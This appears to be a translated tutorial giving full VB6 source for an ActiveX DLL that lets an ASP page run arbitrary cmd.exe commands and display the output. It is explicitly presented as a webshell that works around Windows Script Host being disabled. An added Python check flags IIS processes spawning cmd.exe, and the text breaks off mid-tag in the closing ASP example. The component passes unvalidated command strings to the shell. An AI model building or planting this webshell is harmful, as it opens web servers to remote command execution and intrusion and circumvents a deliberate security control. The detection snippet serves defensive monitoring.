When managing servers, we sometimes disable Windows Script Host (WSH) for security reasons, which prevents unscrupulous users from using WSH to create a webshell that poses a significant security risk to the server. But what if we have disabled WSH and still want to use our own webshell for server management? This article introduces a component that runs CMD commands from ASP and displays the result. I hope it is of some help.
First we create a new ActiveX DLL project named ASPCMD, with a new class named CmdShell. Under "References" in the "Project" menu, add a reference to the Microsoft Active Server Pages Object Library.
The idea is to use the Windows API ShellExecute to call cmd.exe, save the output to a temporary text file, and then read the contents of that file and display them.
The following is the code for the class CmdShell.cls of the project ASPCMD.
Option Explicit
' ASP intrinsic objects, set in OnStartPage
Dim rp As Response
Dim rq As Request
Dim ap As Application
Dim sr As Server
Dim sn As Session
' API names and aliases are case-sensitive
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Sub ShellEx(ByVal sLocation As String, ByVal sPara As String, Optional MaxedForm As Boolean = False)
    On Error GoTo ErrHandle
    Dim lR As Long
    Dim Style As Long
    Dim hWnd As Long
    If MaxedForm Then
        Style = vbMaximizedFocus
    Else
        Style = vbNormalFocus
    End If
    lR = ShellExecute(hWnd, "open", sLocation, sPara, "", Style)
    If (lR < 0) Or (lR > 32) Then
        ' Success: ShellExecute returns a value greater than 32
    Else
        rp.Write "Error occurred when starting " & sLocation
    End If
    Exit Sub   ' do not fall through into the error handler
ErrHandle:
    rp.Write "Error: " & Err.Description
End Sub
Public Sub OnStartPage(ByVal mySC As ScriptingContext)
    Set rp = mySC.Response
    Set rq = mySC.Request
    Set sr = mySC.Server
    Set ap = mySC.Application
    Set sn = mySC.Session
End Sub
Public Sub OnEndPage()
    Set rp = Nothing
    Set rq = Nothing
    Set sr = Nothing
    Set ap = Nothing
    Set sn = Nothing
End Sub
Private Function FileExists(Filename As String) As Boolean
    Dim i As Integer
    On Error Resume Next
    i = Len(Dir$(Filename))
    If Err Or i = 0 Then FileExists = False Else FileExists = True
End Function
Private Function IsOpen(Filename As String) As Boolean
    Dim fFile As Integer
    Dim msg As String
    fFile = FreeFile()
    On Error GoTo ErrOpen
    ' Opening with an exclusive lock fails while another process still has the file open
    Open Filename For Binary Lock Read Write As fFile
    Close fFile
    Exit Function
ErrOpen:
    If Err.Number <> 70 Then   ' 70 = Permission denied
        msg = "Error # " & Str(Err.Number) & " was generated by " _
            & Err.Source & Chr(13) & Err.Description
    Else
        IsOpen = True
    End If
End Function
Public Sub EXEC1(ByVal strCmd As String)
    On Error GoTo ErrHandle
    ' Placeholder: the timeout value (in seconds) is missing from the source page
    Const MAX_WAIT As Integer = 30
    Dim MyTimer As Integer
    MyTimer = 0
    Dim strOut As String
    Dim strFName As String
    ' Generate a temporary file name
    If Len(App.Path) = 3 Then
        strFName = App.Path & "lhtmp.txt"
    Else
        strFName = App.Path & "\lhtmp.txt"
    End If
    ' Delete the file if it already exists before the run
    If FileExists(strFName) Then
        Kill strFName
    End If
    ' Run the user's command with cmd and redirect the result to the temporary file
    ' Note: the /C parameter of cmd.exe ends the session immediately after running the command,
    ' which is equivalent to entering the command in Windows Run.
    Dim strPara As String
    strPara = "/C " & strCmd & " > " & strFName
    ShellEx "cmd.exe", strPara
    ' Wait for the output file to be created
    Do While Not FileExists(strFName)
        Sleep 1000
        DoEvents
        MyTimer = MyTimer + 1
        If MyTimer = MAX_WAIT Then
            Exit Do
        End If
    Loop
    MyTimer = 0
    ' Wait for the file output to complete
    Do While IsOpen(strFName)
        Sleep 1000
        DoEvents
        MyTimer = MyTimer + 1
        If MyTimer = MAX_WAIT Then
            Exit Do
        End If
    Loop
    ' Display the contents of the output file
    Open strFName For Input As #1
    Do While Not EOF(1)
        Line Input #1, strOut
        rp.Write strOut & vbCrLf
    Loop
    Close #1
    Sleep 1000
    ' Delete the temporary file
    Kill strFName
    Exit Sub
ErrHandle:
    rp.Write "Error occurred: " & Err.Description
End Sub
Build ASPCMD.dll and register the component using regsvr32 aspcmd.dll.
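From a monitoring point of view, the component above appears in process-creation records as an IIS host process starting cmd.exe with /C and its output redirected to a file. The check below over constructed sample events is an added example, not code from the original article; the event field names, the list of IIS host process names and the sample paths are assumptions.

```python
import re

# Assumption: classic ASP pages and their COM components run in one of these hosts.
IIS_HOSTS = {"w3wp.exe", "dllhost.exe", "inetinfo.exe"}
ONE_SHOT = re.compile(r"(?:^|\s)/c(?=\s|$)", re.I)  # cmd.exe /C <command>
# A trailing "> file" or ">> file" that is not an escaped ^> and not a 2>&1.
REDIRECT = re.compile(r'(?<![\^>])>{1,2}\s*("[^"]+"|[^\s>|&]+)\s*$')

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the reasons an event matches the pattern (empty list = no match)."""
    if basename(event["image"]) != "cmd.exe":
        return []
    parent = basename(event["parent_image"])
    if parent not in IIS_HOSTS:
        return []
    reasons = ["cmd.exe started by IIS host process " + parent]
    if ONE_SHOT.search(event["command_line"]):
        reasons.append("one-shot /C invocation")
    redirect = REDIRECT.search(event["command_line"])
    if redirect:
        reasons.append("output redirected to " + redirect.group(1).strip('"'))
    return reasons

def flagged(events):
    """Return (index, reasons) for every event that matches."""
    return [(i, r) for i, r in enumerate(map(classify, events)) if r]

# Constructed sample events (hypothetical field names and paths).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\WINDOWS\system32\inetsrv\w3wp.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": r'"C:\WINDOWS\system32\cmd.exe" /C ipconfig /all > C:\Inetpub\bin\lhtmp.txt'},
    {"parent_image": r"C:\WINDOWS\explorer.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": "cmd.exe"},
    {"parent_image": r"C:\WINDOWS\system32\dllhost.exe",
     "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": "cmd.exe /c ver"},
    {"parent_image": r"C:\WINDOWS\system32\inetsrv\w3wp.exe",
     "image": r"C:\WINDOWS\Microsoft.NET\Framework\csc.exe",
     "command_line": "csc.exe /out:page.dll page.cs"},
]

if __name__ == "__main__":
    for index, reasons in flagged(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
```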
The following is an example of an ASP program that invokes the DLL:
<% @LANGUAGE = "VBSCRIPT"%>
<style type=&quo